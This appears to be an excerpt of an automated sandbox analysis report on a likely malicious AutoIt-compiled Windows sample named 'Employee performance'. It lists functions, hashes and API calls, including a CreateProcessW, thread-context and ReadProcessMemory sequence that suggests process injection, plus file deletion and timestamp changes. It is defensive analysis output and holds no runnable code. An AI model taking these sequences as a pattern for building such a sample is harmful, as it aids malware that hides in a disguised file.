Opcode Fuzzy Hash: 6af094bf6a0cbca682249db23407bd25431b1b282bafe0ca61098e5037ad3c88
Instruction Fuzzy Hash: 83F0DA765406A07AEB311B17AC0CE772EBDE7C6F60F40805EF980A6554C6BA1850DBB0

Function 00F923B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 157
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F922A0: Sleep.KERNELBASE(000001F4), ref: 00F922B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00F9250B

Strings

2MDTBR6LJ1B9K3P3U, xrefs: 00F9256E, 00F92571

Memory Dump Source

Source File: 00000000.00000002.1261034105.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_Employee performance.jbxd

Similarity

API ID: CreateFileSleep
String ID: 2MDTBR6LJ1B9K3P3U
API String ID: 2694422964-2293013095
Opcode ID: 00b16fe2bb4ed23dd46046bca8faf82f25c55d16adb14dbd0e360036920f4022
Instruction ID: 70d986c8a7c9509753544b7f097bef79c59b07b7353adf0b108ff66a297518fb
Opcode Fuzzy Hash: 00b16fe2bb4ed23dd46046bca8faf82f25c55d16adb14dbd0e360036920f4022
Instruction Fuzzy Hash: 9661A031E14248EBEF11DBE4C854BEEBB79AF18300F044199E249BB2C1D7BA5B45CB65

Function 01042947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01042C05
DeleteFileW.KERNEL32(?), ref: 01042C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 01042C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01042CAE
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01042CC0

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 81855a6994aba1ee4a4f64c7fb459e760bbf224ec05a51a19a8e280495fdb1e8
Instruction ID: a63eff196d25636b92cb02e95866bdccbf3afe0d9e3892897900dc3ac2b9c6c1
Opcode Fuzzy Hash: 81855a6994aba1ee4a4f64c7fb459e760bbf224ec05a51a19a8e280495fdb1e8
Instruction Fuzzy Hash: BCB160B1E0011DABDF21DBA4DC85EEE7BBDEF48340F0440A6F649E6151EA359A448FA1

Function 00FD3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00FD3B0F,SwapMouseButtons,00000004,?), ref: 00FD3B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00FD3B0F,SwapMouseButtons,00000004,?), ref: 00FD3B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00FD3B0F,SwapMouseButtons,00000004,?), ref: 00FD3B83

Strings

Control Panel\Mouse, xrefs: 00FD3B3E

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 3eb3e8727deb137a3fa924c0ada26fcd4bdc96114e2067c6e751f1fc54e08ecf
Instruction ID: 39c419590c175170c2e9e2ae6e5a0efa0853f9fd37f2d10228e1dc9b1e5fdf20
Opcode Fuzzy Hash: 3eb3e8727deb137a3fa924c0ada26fcd4bdc96114e2067c6e751f1fc54e08ecf
Instruction Fuzzy Hash: B8115AB5510208FFEB208FA4DC44AAEB7B9EF41750B14446BF941D7214D2319F40A760

Function 00F912A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00F91A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F91AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F91B13

Memory Dump Source

Source File: 00000000.00000002.1261034105.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_Employee performance.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
Instruction ID: 7e6b02e3bc738fb35679990f89f22250c94d1753c0115acf10cdae5f6f31c33c
Opcode Fuzzy Hash: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
Instruction Fuzzy Hash: A6620830A14259DBEB24DFA4C850BDEB372FF58300F1091A9D10DEB294E77A9E81DB59

Function 00FDDFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 010232B7

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: b4bd6c0bb28fbb4893021d18a54e6e5f5f0b3e3de5d8b4ab08e229aba0681ca7
Instruction ID: c557b984e7b9a1a4709e5d363269930d59b3b08d4c0283b792c959f9de920737
Opcode Fuzzy Hash: b4bd6c0bb28fbb4893021d18a54e6e5f5f0b3e3de5d8b4ab08e229aba0681ca7
Instruction Fuzzy Hash: 32C26A75E00215CFCB24EF58C880BADB7B2BF09310F28856AE955AF351D379AD41EB91

Function 00FD3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 010133A2

Part of subcall function 00FD6B57: _wcslen.LIBCMT ref: 00FD6B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FD3A04

Strings

Line: , xrefs: 010133EB

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 5f47c029126f5f922a6d3a5ab90b3e8200662c3368bd73432195051af8197354
Instruction ID: a30fad9011d538f131692e8177828903b99432fb2e9a0dafff3da6383c6931ad
Opcode Fuzzy Hash: 5f47c029126f5f922a6d3a5ab90b3e8200662c3368bd73432195051af8197354
Instruction Fuzzy Hash: 9131E272508304AAD325EB20DC45BEFB7DAAF40720F08452FF6D982285DB789A48D7D3

Function 00FEFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00FF0668

Part of subcall function 00FF32A4: RaiseException.KERNEL32(?,?,?,00FF068A,?,010A1444,?,?,?,?,?,?,00FF068A,00FD1129,01098738,00FD1129), ref: 00FF3304

__CxxThrowException@8.LIBVCRUNTIME ref: 00FF0685

Strings

Unknown exception, xrefs: 00FF0692

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 0700ba37a045dc253a34298f4f34ab1782dd6f1988ec7f186b2347b3ccb56b1a
Instruction ID: 6549ce84ff6b2fa1da23615da2e789f0c6d8cd7ba87a70eb96777c81d314ab7b
Opcode Fuzzy Hash: 0700ba37a045dc253a34298f4f34ab1782dd6f1988ec7f186b2347b3ccb56b1a
Instruction Fuzzy Hash: 10F02835D0020D738F10BA65DC46D7E7B6C5E00320B504071BA14C55B2EF74EA29F5C0

Function 01043017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0104302F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 01043044

Strings

aut, xrefs: 01043038

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 5585dc3ee21d4a41873f90b30cb9faeb5af0b6e5912fb292a6e538f054bdcb23
Instruction ID: b0de322f861074c1c4c4526cad7b494af72b2df92950950543181a42fd6af11b
Opcode Fuzzy Hash: 5585dc3ee21d4a41873f90b30cb9faeb5af0b6e5912fb292a6e538f054bdcb23
Instruction Fuzzy Hash: 79D05B7150031467DB309695DD0DFC73A6CD704650F000151BAD5D6095DAB99544CBD0

Function 01057F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 010582F5
TerminateProcess.KERNEL32(00000000), ref: 010582FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 010584DD

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: e447b4ce64c700184d0436460984487b1af19496556185a7f2953c79db0bcd50
Instruction ID: 0b227fbe29a2293085e8124056c631bc4286e5785783f961b1b12418b94dd0e1
Opcode Fuzzy Hash: e447b4ce64c700184d0436460984487b1af19496556185a7f2953c79db0bcd50
Instruction Fuzzy Hash: BE127A71A083419FD754DF29C484B6ABBE5BF88318F04895EEC898B352CB35E945CF92

Function 01005AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44c5428bc4effedf1078349b1bd301cec1e1b94add8360eb92126d15f4a3d872
Instruction ID: 9250ca9235612dbf8b1070ec45a9a7cef95f27818fb606962aa378a9171510bf
Opcode Fuzzy Hash: 44c5428bc4effedf1078349b1bd301cec1e1b94add8360eb92126d15f4a3d872
Instruction Fuzzy Hash: ED519E7190020E9FEB239FA8CD45EFEBFB8AF45314F040199E585A72D1D6759A01CF61

Function 00FD10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FD1BF4
Part of subcall function 00FD1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FD1BFC
Part of subcall function 00FD1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FD1C07
Part of subcall function 00FD1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FD1C12
Part of subcall function 00FD1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FD1C1A
Part of subcall function 00FD1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FD1C22

Part of subcall function 00FD1B4A: RegisterWindowMessageW.USER32(00000004,?,00FD12C4), ref: 00FD1BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00FD136A
OleInitialize.OLE32 ref: 00FD1388
CloseHandle.KERNEL32(00000000,00000000), ref: 010124AB

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: e5531d146ff76993f1c0f34f7f04cb78fb2ff16baa0774cf7179cf54554ee1f4
Instruction ID: 030bfdad99d34ac0324d188fe46c93549dcb644099facb2f25f28600ffb19069
Opcode Fuzzy Hash: e5531d146ff76993f1c0f34f7f04cb78fb2ff16baa0774cf7179cf54554ee1f4
Instruction Fuzzy Hash: A271CBB8901A10CFC3A8EF79E5456953AE5FB49384FD8822AD0DAC7389EB3E4401CF51

Function 010086AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,010085CC,?,01098CC8,0000000C), ref: 01008704
GetLastError.KERNEL32(?,010085CC,?,01098CC8,0000000C), ref: 0100870E
__dosmaperr.LIBCMT ref: 01008739

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: 9625e69e5861983343c146a167b76f0e4a3d6853d0f893a4b9dfbe02df0d183d
Instruction ID: 3e572dd623319e50030c0fa135d6f1f4783bc1fad326ff9ccf954bb002b2149a
Opcode Fuzzy Hash: 9625e69e5861983343c146a167b76f0e4a3d6853d0f893a4b9dfbe02df0d183d
Instruction Fuzzy Hash: 45018232E0426016F6B36238AC4477E2FC96B95734F26819BE9C89B0D7DE65C4818750

Function 01042FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,01042CD4,?,?,?,00000004,00000001), ref: 01042FF2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,01042CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 01043006
CloseHandle.KERNEL32(00000000,?,01042CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0104300D

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: f37348d795e27acda81005bb195c02715799a3c537b671903d31fb02512d40c2
Instruction ID: 904ba85e6ae246260efa49a88866bcbedc1f4adf96e287718e23786ad7f5e928
Opcode Fuzzy Hash: f37348d795e27acda81005bb195c02715799a3c537b671903d31fb02512d40c2
Instruction Fuzzy Hash: ADE0863228022077F6302659BD0DF8B3E5CDB86B71F104224F7E9790D086A6250143A8

Function 00FE1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00FE17F6

Strings

CALL, xrefs: 00FE17C6

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 5b78f673acbc8439b632d3ae859cef064add2f908ed68ef30c16ec6b4b3d0b5a
Instruction ID: 21eb903e0b337c4cfcd7d80fa3aa37b832fa298c8769b48ce0f4b0675d37913a
Opcode Fuzzy Hash: 5b78f673acbc8439b632d3ae859cef064add2f908ed68ef30c16ec6b4b3d0b5a
Instruction Fuzzy Hash: ED227D706083819FC714DF16C880B2ABBF1BF85314F18896DF8968B362D776E945DB92

Function 01046EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 01046F6B

Part of subcall function 00FD4ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,010A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FD4EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 01046F5A, 01046F63

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: 0dcc7c8e76f483d8d3b0268ffa537c428adc674922931a22bb0432f14e7970ea
Instruction ID: 8393944ad3275175dd219508259e7fbe9cd9e0de12ba228406f19b2d9296e342
Opcode Fuzzy Hash: 0dcc7c8e76f483d8d3b0268ffa537c428adc674922931a22bb0432f14e7970ea
Instruction Fuzzy Hash: B4B195711082018FCB15EF24C8919AEB7E6AF94300F48496EF5D697362EB34ED49DB92

Function 00FD2DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 01012C8C

Part of subcall function 00FD3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FD3A97,?,?,00FD2E7F,?,?,?,00000000), ref: 00FD3AC2

Part of subcall function 00FD2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FD2DC4

Strings

X, xrefs: 01012C5A

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: 09c3c4898de44209781de2d079df9bcfd17cf146ff41df96a55a939efef2bbc1
Instruction ID: d88c40635c814e1cb6dde71213d9c3ef727d5bd3fb8b241054bbfeeb2507fd93
Opcode Fuzzy Hash: 09c3c4898de44209781de2d079df9bcfd17cf146ff41df96a55a939efef2bbc1
Instruction Fuzzy Hash: 1A21F371A002489BDF41EF94CC45BEE7BF9AF49304F04805AE544E7345DBB856899BA1

Function 01042557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 01042587

Strings

EA06, xrefs: 010425B9

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: ff28abbbfcf1955e75fc027889a6de949fbf594463ab02ef2a91e84421e75de8
Instruction ID: 3e101d4962b70f8c7939fbae7ec3d5edf49c9926df9d5d9cd9ebd2d105274bfc
Opcode Fuzzy Hash: ff28abbbfcf1955e75fc027889a6de949fbf594463ab02ef2a91e84421e75de8
Instruction Fuzzy Hash: 2B01B9719442587EDF18D7A8CC56EBE7BF89F05305F00455AF193D6181E5B8E704DB60

Function 00FD3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FD3908

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 8d7d62f0a00c138c72fbc698890493c0259c53978ce34a70fd3f64220eb9c7be
Instruction ID: c3d448abb41be867d5d0b24c8ca225ffe8be12ad6ee3bbb6f6bc5c81f8e8629c
Opcode Fuzzy Hash: 8d7d62f0a00c138c72fbc698890493c0259c53978ce34a70fd3f64220eb9c7be
Instruction Fuzzy Hash: 373193729047019FE720DF24D484797BBE8FB49718F04092EF6DA97340E7B6AA44DB52

Function 00FDB710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00FDBB4E

